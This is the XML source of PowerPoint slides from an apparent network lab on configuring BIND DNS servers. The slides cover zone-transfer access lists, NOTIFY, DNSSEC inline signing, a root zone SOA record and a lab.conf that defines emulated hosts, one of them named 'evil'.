                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</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allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-transfer { 100.0.75.5; };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also-notify</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> { 100.0.75.5; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE6DE0E-AB83-9FA9-C7FB-CAEE6F249C5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="13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nsroot</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94CB584C-0D9C-B07D-1E6B-A7C41C9F413B}"/>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D757E562-766F-3041-096C-341EE0BCF8C5}"/>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971AF935-77BE-8091-0ED2-4514EF548D55}"/>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8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3DD33F-76CE-C98D-E9DC-F3BAD182B654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7251554" y="1989011"/>
            <a:ext cx="4580105" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85203"/>
              <a:gd name="adj2" fmla="val 20127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Enable automatic DNSSEC key management using BIND's default policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76D97FB4-3713-C99B-F987-8139458911FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3061162"/>
            <a:ext cx="3830316" cy="569247"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121810"/>
              <a:gd name="adj2" fmla="val 10385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enable "inline signature".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CB5C52-4E93-CAC3-CB44-C67566CB3AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3846542"/>
            <a:ext cx="3830316" cy="1249873"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83676"/>
              <a:gd name="adj2" fmla="val -22925"/>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defines an access control list that only allows the IP address 100.0.75.5 to download the entire zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C455760-7D60-7B93-5233-17E9A115901A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6679662" y="5312548"/>
            <a:ext cx="3830316" cy="941320"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59803"/>
              <a:gd name="adj2" fmla="val -12492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tells the master to send a signal (NOTIFY) to IP 100.0.75.5 every time the zone is updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71A5515-A351-9CC4-4480-EC41CDCFC57E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="1675313"/>
            <a:ext cx="1918176" cy="1550954"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88294"/>
              <a:gd name="adj2" fmla="val 38616"/>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declares that this server is the master (primary) for this zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{598DBDF9-5AF5-78EB-741F-7335419106A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="3923569"/>
            <a:ext cx="2311610" cy="1550955"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66446"/>
              <a:gd name="adj2" fmla="val -8546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Indicates the path to the text file containing the DNS records for the zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5392262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BCC12-AEA0-EF6C-6966-603D0016964A}"/>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B2A16126-8DE4-5051-0D70-B9EDC3BB467F}"/>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FAB7A0FB-E7C3-1075-9C06-3F717ADFC9AF}"/>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F51AC7AA-C8C2-F7D6-B741-9D680D38F53A}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33F4D3C0-A89C-9682-1DF7-F73B4B98EADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC84C6E0-FA61-BCD9-8B4D-B43D445FEFB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D22B63-5F9D-75FB-8DCE-083274B4EDB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837"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nsroot</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named.conf.options</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735345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A61BD-7CC0-1239-A043-4AED4CA98720}"/>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E90797DB-31A2-25A9-F621-E42731E711C1}"/>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AABA4C38-4199-CA74-DDD3-65198C4BA509}"/>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1A63D22B-26FE-483A-7334-2724147BCD8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EB849F58-F78E-CB4F-547E-5AE08BDCFE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13402060-D26D-6684-F4F5-52DE845EEF72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0"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pc3[0]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</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linuxserver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firefox</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pc3[port]="3001:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged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true</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pc3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[1]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[2]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</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seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE648D73-0971-C121-D306-CDC7D4C96846}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A867736-181A-908D-1205-CBE6203AE0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7066800" y="1617304"/>
            <a:ext cx="3470176" cy="463153"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -89152"/>
              <a:gd name="adj2" fmla="val 7321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graphic image for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6965551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55BF1-C555-1671-F153-8C1F89E764DF}"/>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FFF8BA95-97CF-01A6-4132-73BE0DE6E885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="516090" y="2086646"/>
            <a:ext cx="11159820" cy="2865208"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1009"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E67438-DF6B-58E0-5277-7FA84DE76659}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="951"/>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100.0.75.5/24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default via 100.0.75.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E584613B-10BD-7F5A-C786-1C1FEA20FACA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>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a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{051A66E8-38C2-AA39-B668-4DD3E03E5713}"/>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BE614721-DD2E-3243-CF2A-754683E3E024}"/>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C0615AF3-D31D-C953-B22B-720103ED687B}"/>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5069119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67697-3285-0042-03EA-61A5BD50CAA2}"/>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B8A2D593-02A3-C771-32CB-B5E1BF8D15FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB97C6D3-6DEB-0889-414A-3F7C5460E155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>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$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
